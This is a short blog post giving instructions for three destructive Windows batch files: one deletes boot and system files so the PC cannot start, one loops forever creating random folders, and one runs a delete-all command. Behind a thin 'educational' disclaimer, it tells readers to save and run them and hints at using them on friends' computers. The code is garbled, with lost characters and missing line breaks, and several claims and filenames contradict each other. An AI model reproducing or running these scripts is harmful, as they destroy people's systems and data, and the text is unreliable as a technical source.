Wednesday, August 29, 2018
Three Most Dangerous Virus to Attack PCS
Three Most Dangerous Virus to Attack PCS
some times we do like to play with computer code, playing with this code can lead to and undoable mistake, it can led to a fatal damage to our computer. Batch commands act like a directing person that tells the PC what to do. These batch files have the dangerous and the non dangerous ones, in this code am going to outline computer batch command that are harmful to our computer and how to create them. *Disclaimer: This is only for educational purpose and we dont endulge or support the creation of virus.
...we are not responsible for any loss, play safe with this list of virus.
How to Shut Down a Computer Forever.
Open your Notepad copy and paste the below code into it, then save it with any name but must end with .bat
@echo offattrib -r -s -h c:autoexec.batdel c:autoexec.batattrib -r -s -h c: oot.inidel c: oot.iniattrib -r -s -h c: tldrdel c: tldrattrib -r -s -h c:windowswin.inidel c:windowswin.iniSave it as �shutdown-forever.bat�.
How to Create 3000 Folders in a minute
@echo off:topmd %random%goto top
Save it as 1000.bat. Echo off makes your screen go blank while it creates folders.
md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)goto top � return the command to :top, causes an infinite loop.
The folders will be saved inside the 100.bat folder and might look suspicious.
Delete the Entire Files in your Hard Disk(c:)
Past this code in to your Notepad
and save it as .bat
del *.*
This will delete all your files in less than 5 minutes.
-Dont try this at home.
What the author have to say.
While playing with these codes use them with caution, dont be caught using it in your friends PC.